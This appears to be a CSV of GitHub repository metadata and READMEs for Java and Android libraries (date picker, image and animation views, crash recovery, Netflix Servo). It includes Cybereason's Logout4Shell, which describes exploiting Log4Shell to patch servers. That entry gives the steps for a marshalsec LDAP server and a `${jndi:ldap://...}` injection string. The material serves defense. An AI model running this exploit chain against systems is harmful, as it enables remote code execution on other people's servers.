full_name,default_branch,stars,forks,created_at,size,open_issues_count,description,topics,readme
heysupratim/material-daterange-picker,master,1328,269,2015-09-14T12:00:47Z,868,14,A material Date Range Picker based on wdullaers MaterialDateTimePicker,datepicker datetimepicker material picker range-selection timepicker,"[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501)
[ ![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg) ](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library)
Material Date and Time Picker with Range Selection
======================================================
Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker
## Adding to your project
Add the jcenter repository information in your build.gradle file like this
```java
repositories {
jcenter()
}
dependencies {
implementation 'com.borax12.materialdaterangepicker:library:2.0'
}
```
Beginning Version 2.0 now also available on Maven Central
## Date Selection
![FROM](/screenshots/2.png?raw=true)
![TO](/screenshots/1.png?raw=true)
## Time Selection
![FROM](/screenshots/3.png?raw=true)
![TO](/screenshots/4.png?raw=true)
Support for Android 4.0 and up.
From the original library documentation -
You may also add the library as an Android Library to your project. All the library files live in ```library```.
Using the Pickers
--------------------------------
1. Implement an `OnDateSetListener` or `OnTimeSetListener`
2. Create a ``DatePickerDialog` using the supplied factory
### Implement an `OnDateSetListener`
In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
or
### Implement an `OnTimeSetListener`
In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers.
```java
//new onDateSet
@Override
public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
}
@Override
public void onTimeSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
String hourString = hourOfDay < 10 ? ""0""+hourOfDay : """"+hourOfDay;
String minuteString = minute < 10 ? ""0""+minute : """"+minute;
String hourStringEnd = hourOfDayEnd < 10 ? ""0""+hourOfDayEnd : """"+hourOfDayEnd;
String minuteStringEnd = minuteEnd < 10 ? ""0""+minuteEnd : """"+minuteEnd;
String time = ""You picked the following time: From - ""+hourString+""h""+minuteString+"" To - ""+hourStringEnd+""h""+minuteStringEnd;
timeTextView.setText(time);
}
```
### Create a DatePickerDialog` using the supplied factory
You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
```java
Calendar now = Calendar.getInstance();
DatePickerDialog dpd = DatePickerDialog.newInstance(
MainActivity.this,
now.get(Calendar.YEAR),
now.get(Calendar.MONTH),
now.get(Calendar.DAY_OF_MONTH)
);
dpd.show(getFragmentManager(), ""Datepickerdialog"");
```
### Create a TimePickerDialog` using the supplied factory
You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
```java
Calendar now = Calendar.getInstance();
TimePickerDialog tpd = TimePickerDialog.newInstance(
MainActivity.this,
now.get(Calendar.HOUR_OF_DAY),
now.get(Calendar.MINUTE),
false
);
tpd.show(getFragmentManager(), ""Timepickerdialog"");
```
For other documentation regarding theming , handling orientation changes , and callbacks - check out the original documentation - https://github.com/wdullaer/MaterialDateTimePicker"
Cybereason/Logout4Shell,main,1724,115,2021-12-10T22:38:53Z,106,1,Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell,,"# Logout4Shell
![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)
## Description
A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021.
The flaw has been dubbed “Log4Shell,”, and has the highest possible severity rating of 10. Software made or
managed by the Apache Software Foundation (From here on just ""Apache"") is pervasive and comprises nearly a third of all
web servers in the world—making this a potentially catastrophic flaw.
The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.
While the best mitigation against these vulnerabilities is to patch log4j to
~~2.15.0~~2.17.0 and above, in Log4j version (>=2.10) this behavior can be partially mitigated (see below) by
setting system property `log4j2.formatMsgNoLookups` to `true` or by removing
the JndiLookup class from the classpath.
On 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. This
vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that
gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate log4shell. An
additional CVE, less severe, CVE-2021-45105 was discovered. This vulnerability exposes the server to
an infinite recursion that could crash the server is some scenarios. It is recommened to upgrade to
2.17.0
However, enabling these system property requires access to the vulnerable servers as well as a restart.
The [Cybereason](https://www.cybereason.com) research team has developed the
following code that _exploits_ the same vulnerability and the payload therein
sets the vulnerable setting as disabled. The payload then searches
for all `LoggerContext` and removes the JNDI `Interpolator` preventing even recursive abuses.
this effectively blocks any further attempt to exploit Log4Shell on this server.
This Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)
However, this project attempts to fix the vulnerability by using the bug against itself.
You can learn more about Cybereason's ""vaccine"" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website.
Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)
## Supported versions
Logout4Shell supports log4j version 2.0 - 2.14.1
## How it works
On versions (>= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is
set to `True` disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag is insufficient,
therefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to
process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail.
Then, the log4j jarfile will be remade and patched. The patch is included in this
git repository, however it is not needed in the final build because the real patch
is included in the payload as Base64.
In persistence mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`,
remove the `JndILookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM
restarts the `JndiLookup` class cannot be found and log4j will not support for JNDI
## Transient vs Persistent mode
This package generates two flavors of the payload - Transient and Persistent.
In Transient mode, the payload modifies
the current running JVM. The payload is very delicate to just touch the logger context and configuration. We thus
believe the risk of using the Transient mode are very low on production environments.
Persistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j`
loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as
modifying the plugin registry. There is inherently more risk in this approach as if the `log4j-core.jar` becomes
corrupted, the JVM may crash on start.
The choice of which mode to use is selected by the URL given in step [2.3](#execution) below. The
class `Log4jRCETransient` selects the Transient Mode and the class `Log4jRCEPersistent` selects the persistent mode
Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!
## How to use
1. Download this repository and build it
1.1 `git clone https://github.com/cybereason/Logout4Shell.git`
1.2 build it - `mvn package`
1.3 `cd target/classes`
1.4 run the webserver - `python3 -m http.server 8888`
2. Download, build and run Marshalsec's ldap server
2.1 `git clone https://github.com/mbechler/marshalsec.git`
2.2 `mvn package -DskipTests`
2.3 `cd target`
2.4 `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""http://:8888/#Log4jRCE""`
4. To immunize a server
3.1 enter `${jndi:ldap://:1389/a}` into a vulnerable field (such as user name)
## DISCLAIMER:
The code described in this advisory (the “Code”) is provided on an “as is” and
“as available” basis may contain bugs, errors and other defects. You are
advised to safeguard important data and to use caution. By using this Code, you
agree that Cybereason shall have no liability to you for any claims in
connection with the Code. Cybereason disclaims any liability for any direct,
indirect, incidental, punitive, exemplary, special or consequential damages,
even if Cybereason or its related parties are advised of the possibility of
such damages. Cybereason undertakes no duty to update the Code or this
advisory.
## License
The source code for the site is licensed under the MIT license, which you can find in the LICENSE file.
"
DingMouRen/PaletteImageView,master,1762,231,2017-04-25T12:05:08Z,17741,23,"懂得智能配色的ImageView,还能给自己设置多彩的阴影哦。(Understand the intelligent color matching ImageView, but also to set their own colorful shadow Oh!)",,"![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png)
### English Readme
[English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md)
(Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan))
### 简介
* 可以解析图片中的主色调,**默认将主色调作为控件阴影的颜色**
* 可以**自定义设置控件的阴影颜色**
* 可以**控制控件四个角的圆角大小**(如果控件设置成正方向,随着圆角半径增大,可以将控件变成圆形)
* 可以**控制控件的阴影半径大小**
* 可以分别**控制阴影在x方向和y方向上的偏移量**
* 可以将图片中的颜色解析出**六种主题颜色**,每一种主题颜色都有相应的**匹配背景、标题、正文的推荐颜色**
### build.gradle中引用
```
compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7'
```
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif)
##### 1.参数的控制
圆角半径|阴影模糊范围|阴影偏移量
---|---|---
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif)
##### 2.阴影颜色默认是图片的主色调
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif)
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png)
##### 3.图片颜色主题解析
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png)
### 使用
```
mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() {
@Override//解析图片的颜色完毕
public void onComplete(PaletteImageView paletteImageView) {
int[] vibrant = paletteImageView.getVibrantColor();
int[] vibrantDark = paletteImageView.getDarkVibrantColor();
int[] vibrantLight = paletteImageView.getLightVibrantColor();
int[] muted = paletteImageView.getMutedColor();
int[] mutedDark = paletteImageView.getDarkMutedColor();
int[] mutedLight = paletteImageView.getLightMutedColor();
}
@Override//解析图片的颜色失败
public void onFail() {
}
});
```
### xml属性
xml属性 | 描述
---|---
app:palettePadding | **表示阴影显示最大空间距离。值为0,没有阴影,大于0,才有阴影。**
app:paletteOffsetX | 表示阴影在x方向上的偏移量
app:paletteOffsetY | 表示阴影在y方向上的偏移量
app:paletteSrc | 表示图片资源
app:paletteRadius | 表示圆角半径
app:paletteShadowRadius | 表示阴影模糊范围
### 公共的方法
方法 | 描述
---|---
public void setShadowColor(int color) | 表示自定义设置控件阴影的颜色
public void setBitmap(Bitmap bitmap) | 表示设置控件位图
public void setPaletteRadius(int raius) | 表示设置控件圆角半径
public void setPaletteShadowOffset(int offsetX, int offsetY) | 表示设置阴影在控件阴影在x方向 或 y方向上的偏移量
public void setPaletteShadowRadius(int radius) | 表示设置控件阴影模糊范围
public void setOnParseColorListener(OnParseColorListener listener) | 设置控件解析图片颜色的监听器
public int[] getVibrantColor() | 表示获取Vibrant主题的颜色数组;假设颜色数组为arry,arry[0]是推荐标题使用的颜色,arry[1]是推荐正文使用的颜色,arry[2]是推荐背景使用的颜色。颜色只是用于推荐,可以自行选择
public int[] getDarkVibrantColor()| 表示获取DarkVibrant主题的颜色数组,数组元素含义同上
public int[] getLightVibrantColor()| 表示获取LightVibrant主题的颜色数组,数组元素含义同上
public int[] getMutedColor()| 表示获取Muted主题的颜色数组,数组元素含义同上
public int[] getDarkMutedColor()| 表示获取DarkMuted主题的颜色数组,数组元素含义同上
public int[] getLightMutedColor()| 表示获取LightMuted主题的颜色数组,数组元素含义同上
此项目已暂停维护
"
totond/TextPathView,master,1916,214,2018-01-10T10:36:47Z,315,3,A View with text path animation!,,"# TextPathView
![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg)
> [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md)
## 介绍
TextPathView是一个把文字转化为路径动画然后展现出来的自定义控件。效果如上图。
> 这里有[原理解析!](https://juejin.im/post/5a9677b16fb9a063375765ad)
### v0.2.+重要更新
- 现在不但可以控制文字路径结束位置end,还可以控制开始位置start,如上图二
- 可以通过PathCalculator的子类来控制实现一些字路径变化,如下面的MidCalculator、AroundCalculator、BlinkCalculator
- 可以通知直接设置FillColor属性来控制结束时是否填充颜色
![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png)
## 使用
主要的使用流程就是输入文字,然后设置一些动画的属性,还有画笔特效,最后启动就行了。想要自己控制绘画的进度也可以,详情见下面。
### Gradle
```
compile 'com.yanzhikai:TextPathView:0.2.1'
```
> minSdkVersion 16
> 如果遇到播放完后消失的问题,请关闭硬件加速,可能是硬件加速对`drawPath()`方法不支持
### 使用方法
#### TextPathView
TextPathView分为两种,一种是每个笔画按顺序刻画的SyncTextPathView,一种是每个笔画同时刻画的AsyncTextPathView,使用方法都是一样,在xml里面配置属性,然后直接在java里面调用startAnimation()方法就行了,具体的可以看例子和demo。下面是一个简单的例子:
xml里面:
```
```
java里面使用:
```
atpv1 = findViewById(R.id.atpv_1);
stpv_2017 = findViewById(R.id.stpv_2017);
//从无到显示
atpv1.startAnimation(0,1);
//从显示到消失
stpv_2017.startAnimation(1,0);
```
还可以通过控制进度,来控制TextPathView显示,这里用SeekBar:
```
sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() {
@Override
public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {
atpv1.drawPath(progress / 1000f);
stpv_2017.drawPath(progress / 1000f);
}
}
```
#### PathView
PathView是0.1.1版本之后新增的,拥有三个子类TextPathView、SyncPathView和AsyncPathView,前者上面有介绍是文字的路径,后面这两个就是图形的路径,必须要输入一个Path类,才能正常运行:
```
public class TestPath extends Path {
public TestPath(){
init();
}
private void init() {
addCircle(350,300,150,Direction.CCW);
addCircle(350,300,100,Direction.CW);
addCircle(350,300,50,Direction.CCW);
moveTo(350,300);
lineTo(550,500);
}
}
```
```
//必须先调用setPath设置路径
aspv.setPath(new TestPath());
aspv.startAnimation(0,1);
```
![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true)
(录屏可能有些问题,实际上是没有背景色的)上面就是SyncPathView和AsyncPathView效果,区别和文字路径是一样的。
### 属性
|**属性名称**|**意义**|**类型**|**默认值**|
|--|--|:--:|:--:|
|textSize | 文字的大小size | integer| 108 |
|text | 文字的具体内容 | String| Test|
|autoStart| 是否加载完后自动启动动画 | boolean| false|
|showInStart| 是否一开始就把文字全部显示 | boolean| false|
|textInCenter| 是否让文字内容处于控件中心 | boolean| false|
|duration | 动画的持续时间,单位ms | integer| 10000|
|showPainter | 在动画执行的时候是否执行画笔特效 | boolean| false|
|showPainterActually| 在所有时候是否展示画笔特效| boolean| false|
|~~textStrokeWidth~~ strokeWidth | 路径刻画的线条粗细 | dimension| 5px|
|~~textStrokeColor~~ pathStrokeColor| 路径刻画的线条颜色 | color| Color.black|
|paintStrokeWidth | 画笔特效刻画的线条粗细 | dimension| 3px|
|paintStrokeColor | 画笔特效刻画的线条颜色 | color| Color.black|
|repeat| 是否重复播放动画,重复类型| enum | NONE|
|fillColor| 文字动画结束时是否填充颜色 | boolean | false |
|**repeat属性值**|**意义**|
|--|--|
|NONE|不重复播放|
|RESTART|动画从头重复播放|
|REVERSE|动画从尾重复播放|
> PS:showPainterActually属性,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false。因此最好用于使用非自带动画的时候。
### 方法
#### 画笔特效
```
//设置画笔特效
public void setPainter(SyncPathPainter painter);
//设置画笔特效
public void setPainter(SyncPathPainter painter);
```
因为绘画的原理不一样,画笔特效也分两种:
```
public interface SyncPathPainter extends PathPainter {
//开始动画的时候执行
void onStartAnimation();
/**
* 绘画画笔特效时候执行
* @param x 当前绘画点x坐标
* @param y 当前绘画点y坐标
* @param paintPath 画笔Path对象,在这里画出想要的画笔特效
*/
@Override
void onDrawPaintPath(float x, float y, Path paintPath);
}
public interface AsyncPathPainter extends PathPainter {
/**
* 绘画画笔特效时候执行
* @param x 当前绘画点x坐标
* @param y 当前绘画点y坐标
* @param paintPath 画笔Path对象,在这里画出想要的画笔特效
*/
@Override
void onDrawPaintPath(float x, float y, Path paintPath);
}
```
看名字就知道是对应哪一个了,想要自定义画笔特效的话就可以实现上面之中的一个或者两个接口来自己画啦。
另外,还有里面已经自带了3种画笔特效,可供参考和使用(关于这些画笔特效的实现,可以参考[原理解析](http://blog.csdn.net/totond/article/details/79375200)):
```
//箭头画笔特效,根据传入的当前点与上一个点之间的速度方向,来调整箭头方向
public class ArrowPainter implements SyncPathPainter {
//一支笔的画笔特效,就是在绘画点旁边画多一支笔
public class PenPainter implements SyncPathPainter,AsyncPathPainter {
//火花特效,根据箭头引申变化而来,根据当前点与上一个点算出的速度方向来控制火花的方向
public class FireworksPainter implements SyncPathPainter {
```
由上面可见,因为烟花和箭头画笔特效都需要记录上一个点的位置,所以只适合按顺序绘画的SyncTextPathView,而PenPainter就适合两种TextPathView。仔细看它的代码的话,会发现画起来都是很简单的哦。
#### 自定义画笔特效
自定义画笔特效也是非常简单的,原理就是在当前绘画点上加上一个附加的Path,实现SyncPathPainter和AsyncPathPainter之中的一个或者两个接口,重写里面的`onDrawPaintPath(float x, float y, Path paintPath)`方法就行了,如下面这个:
```
atpv2.setPathPainter(new AsyncPathPainter() {
@Override
public void onDrawPaintPath(float x, float y, Path paintPath) {
paintPath.addCircle(x,y,6, Path.Direction.CCW);
}
});
```
![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true)
#### 动画监听
```
//设置自定义动画监听
public void setAnimatorListener(PathAnimatorListener animatorListener);
```
PathAnimatorListener是实现了AnimatorListener接口的类,继承它的时候注意不要删掉super父类方法,因为里面可能有一些操作。
#### 画笔获取
```
//获取绘画文字的画笔
public Paint getDrawPaint() {
return mDrawPaint;
}
//获取绘画画笔特效的画笔
public Paint getPaint() {
return mPaint;
}
```
#### 控制绘画
```
/**
* 绘画文字路径的方法
*
* @param start 路径开始点百分比
* @param end 路径结束点百分比
*/
public abstract void drawPath(float start, float end);
/**
* 开始绘制路径动画
* @param start 路径比例,范围0-1
* @param end 路径比例,范围0-1
*/
public void startAnimation(float start, float end);
/**
* 绘画路径的方法
* @param progress 绘画进度,0-1
*/
public void drawPath(float progress);
/**
* Stop animation
*/
public void stopAnimation();
/**
* Pause animation
*/
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void pauseAnimation();
/**
* Resume animation
*/
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void resumeAnimation();
```
#### 填充颜色
```
//直接显示填充好颜色了的全部文字
public void showFillColorText();
//设置动画播放完后是否填充颜色
public void setFillColor(boolean fillColor)
```
由于正在绘画的时候文字路径不是封闭的,填充颜色会变得很混乱,所以这里给出`showFillColorText()`来设置直接显示填充好颜色了的全部文字,一般可以在动画结束后文字完全显示后过渡填充
![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true)
#### 取值计算器
0.2.+版本开始,加入了取值计算器PathCalculator,可以通过`setCalculator(PathCalculator calculator)`方法设置。PathCalculator可以控制路径的起点start和终点end属性在不同progress对应的取值。TextPathView自带一些PathCalculator子类:
- **MidCalculator**
start和end从0.5开始往两边扩展:
![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true)
- **AroundCalculator**
start会跟着end增长,end增长到0.75后start会反向增长
![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true)
- **BlinkCalculator**
start一直为0,end自然增长,但是每增加几次会有一次end=1,造成闪烁
![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true)
- **自定义PathCalculator:**用户可以通过继承抽象类PathCalculator,通过里面的`setStart(float start)`和`setEnd(float end)`,具体可以参考上面几个自带的PathCalculator实现代码。
#### 其他
```
//设置文字内容
public void setText(String text);
//设置路径,必须先设置好路径在startAnimation(),不然会报错!
public void setPath(Path path) ;
//设置字体样式
public void setTypeface(Typeface typeface);
//清除画面
public void clear();
//设置动画时能否显示画笔效果
public void setShowPainter(boolean showPainter);
//设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false
public void setCanShowPainter(boolean canShowPainter);
//设置动画持续时间
public void setDuration(int duration);
//设置重复方式
public void setRepeatStyle(int repeatStyle);
//设置Path开始结束取值的计算器
public void setCalculator(PathCalculator calculator)
```
## 更新
- 2018/03/08 **version 0.0.5**:
- 增加了`showFillColorText()`方法来设置直接显示填充好颜色了的全部文字。
- 把PathAnimatorListener从TextPathView的内部类里面解放出来,之前使用太麻烦了。
- 增加`showPainterActually`属性,设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动将它设置为false。因此它用处就是在不使用自带Animator的时候显示画笔特效。
- 2018/03/08 **version 0.0.6**:
- 增加了`stop(), pause(), resume()`方法来控制动画。之前是觉得让使用者自己用Animator实现就好了,现在一位外国友人[toanvc](https://github.com/toanvc)提交的PR封装好了,我稍作修改,不过后两者使用时API要大于等于19。
- 增加了`repeat`属性,让动画支持重复播放,也是[toanvc](https://github.com/toanvc)同学的PR。
- 2018/03/18 **version 0.1.0**:
- 重构代码,加入路径动画SyncPathView和AsyncPathView,把总父类抽象为PathView
- 增加`setDuration()`、`setRepeatStyle()`
- 修改一系列名字如下:
|Old Name|New Name|
|---|---|
|TextPathPainter|PathPainter|
|SyncTextPainter|SyncPathPainter|
|AsyncTextPainter|AsyncPathPainter|
|TextAnimatorListener|PathAnimatorListener|
- 2018/03/21 **version 0.1.2**:
- 修复高度warp_content时候内容有可能显示不全
- 原来PathMeasure获取文字Path时候,最后会有大概一个像素的缺失,现在只能在onDraw判断progress是否为1来显示完全路径(但是这样可能会导致硬件加速上显示不出来,需要手动关闭这个View的硬件加速)
- 增加字体设置
- 支持自动换行
![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true)
- 2018/09/09 **version 0.1.3**:
- 默认关闭此控件的硬件加速
- 加入内存泄漏控制
- 准备后续优化
- 2019/04/04 **version 0.2.1**:
- 现在不但可以控制文字路径结束位置end,还可以控制开始位置start
- 可以通过PathCalculator的子类来控制实现一些字路径变化,如上面的MidCalculator、AroundCalculator、BlinkCalculator
- 可以通知直接设置FillColor属性来控制结束时是否填充颜色
- 硬件加速问题解决,默认打开
- 去除无用log和报错
#### 后续将会往下面的方向努力:
- 更多的特效,更多的动画,如果有什么想法和建议的欢迎issue提出来一起探讨,还可以提交PR出一份力。
- 更好的性能,目前单个TextPathView在模拟器上运行动画时是不卡的,多个就有一点点卡顿了,在性能较好的真机多个也是没问题的,这个性能方面目前还没头绪。
- 文字换行符支持。
- Path的宽高测量(包含空白,从坐标(0,0)开始)
## 贡献代码
如果想为TextPathView的完善出一份力的同学,欢迎提交PR:
- 首先请创建一个分支branch。
- 如果加入新的功能或者效果,请不要覆盖demo里面原来用于演示Activity代码,如FristActivity里面的实例,可以选择新增一个Activity做演示测试,或者不添加演示代码。
- 如果修改某些功能或者代码,请附上合理的依据和想法。
- 翻译成English版README(暂时没空更新英文版)
## 开源协议
TextPathView遵循MIT协议。
## 关于作者
> id:炎之铠
> 炎之铠的邮箱:yanzhikai_yjk@qq.com
> CSDN:http://blog.csdn.net/totond
"
unofficial-openjdk/openjdk,defunct,2171,1032,2012-08-09T20:39:52Z,2386310,0,Do not send pull requests! Automated Git clone of various OpenJDK branches,,"This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK!
"
Sunzxyong/Recovery,master,1695,220,2016-09-04T08:13:19Z,894,27,a crash recovery framework.(一个App异常恢复框架),application-crash crash crash-recovery-framework recovery restore,"# **Recovery**
A crash recovery framework!
----
[ ![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg) ](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE)
[中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md)
# **Introduction**
[Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery)
“Recovery” can help you to automatically handle application crash in runtime. It provides you with following functionality:
* Automatic recovery activity with stack and data;
* Ability to recover to the top activity;
* A way to view and save crash info;
* Ability to restart and clear the cache;
* Allows you to do a restart instead of recovering if failed twice in one minute.
# **Art**
![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg)
# **Usage**
## **Installation**
**Using Gradle**
```gradle
implementation 'com.zxy.android:recovery:1.0.0'
```
or
```gradle
debugImplementation 'com.zxy.android:recovery:1.0.0'
releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0'
```
**Using Maven**
```xml
com.zxy.androidrecovery1.0.0pom
```
## **Initialization**
You can use this code sample to initialize Recovery in your application:
```java
Recovery.getInstance()
.debug(true)
.recoverInBackground(false)
.recoverStack(true)
.mainPage(MainActivity.class)
.recoverEnabled(true)
.callback(new MyCrashCallback())
.silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
.skip(TestActivity.class)
.init(this);
```
If you don't want to show the RecoveryActivity when the application crash in runtime,you can use silence recover to restore your application.
You can use this code sample to initialize Recovery in your application:
```java
Recovery.getInstance()
.debug(true)
.recoverInBackground(false)
.recoverStack(true)
.mainPage(MainActivity.class)
.recoverEnabled(true)
.callback(new MyCrashCallback())
.silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
.skip(TestActivity.class)
.init(this);
```
If you only need to display 'RecoveryActivity' page in development to obtain the debug data, and in the online version does not display, you can set up `recoverEnabled(false);`
## **Arguments**
| Argument | Type | Function |
| :-: | :-: | :-: |
| debug | boolean | Whether to open the debug mode |
| recoverInBackgroud | boolean | When the App in the background, whether to restore the stack |
| recoverStack | boolean | Whether to restore the activity stack, or to restore the top activity |
| mainPage | Class extends Activity> | Initial page activity |
| callback | RecoveryCallback | Crash info callback |
| silent | boolean,SilentMode | Whether to use silence recover,if true it will not display RecoveryActivity and restore the activity stack automatically |
**SilentMode**
> 1. RESTART - Restart App
> 2. RECOVER_ACTIVITY_STACK - Restore the activity stack
> 3. RECOVER_TOP_ACTIVITY - Restore the top activity
> 4. RESTART_AND_CLEAR - Restart App and clear data
## **Callback**
```java
public interface RecoveryCallback {
void stackTrace(String stackTrace);
void cause(String cause);
void exception(
String throwExceptionType,
String throwClassName,
String throwMethodName,
int throwLineNumber
);
void throwable(Throwable throwable);
}
```
## **Custom Theme**
You can customize UI by setting these properties in your styles file:
```xml
#2E2E36#2E2E36#BDBDBD#3C4350#FFFFFF#C6C6C6
```
## **Crash File Path**
> {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/
----
## **Update history**
* `VERSION-0.0.5`——**Support silent recovery**
* `VERSION-0.0.6`——**Strengthen the protection of silent restore mode**
* `VERSION-0.0.7`——**Add confusion configuration**
* `VERSION-0.0.8`——**Add the skip Activity features,method:skip()**
* `VERSION-0.0.9`——**Update the UI and solve some problems**
* `VERSION-0.1.0`——**Optimization of crash exception delivery, initial Recovery framework can be in any position, release the official version-0.1.0**
* `VERSION-0.1.3`——**Add 'no-op' support**
* `VERSION-0.1.4`——**update default theme**
* `VERSION-0.1.5`——**fix 8.0+ hook bug**
* `VERSION-0.1.6`——**update**
* `VERSION-1.0.0`——**Fix 8.0 compatibility issue**
## **About**
* **Blog**:[https://zhengxiaoyong.com](https://zhengxiaoyong.com)
* **Wechat**:
![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg)
# **LICENSE**
```
Copyright 2016 zhengxiaoyong
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
"
Netflix/servo,master,1409,292,2011-12-16T21:09:27Z,5399,1,Netflix Application Monitoring Library,,"# DEPRECATED
This project receives minimal maintenance to keep software that relies on it working. There
is no active development or planned feature improvement. For any new projects it is recommended
to use the [Spectator] library instead.
For more details see the [Servo comparison] page in the Spectator docs.
[Spectator]: https://github.com/Netflix/spectator
[Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/
# No-Op Registry
As of version 0.13.0, the default monitor registry is a no-op implementation to minimize
the overhead for legacy apps that still happen to have some usage of Servo. If the previous
behavior is needed, then set the following system property:
```
com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry
```
# Servo: Application Metrics in Java
> servo v. : WATCH OVER, OBSERVE
>Latin.
Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are:
* **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools.
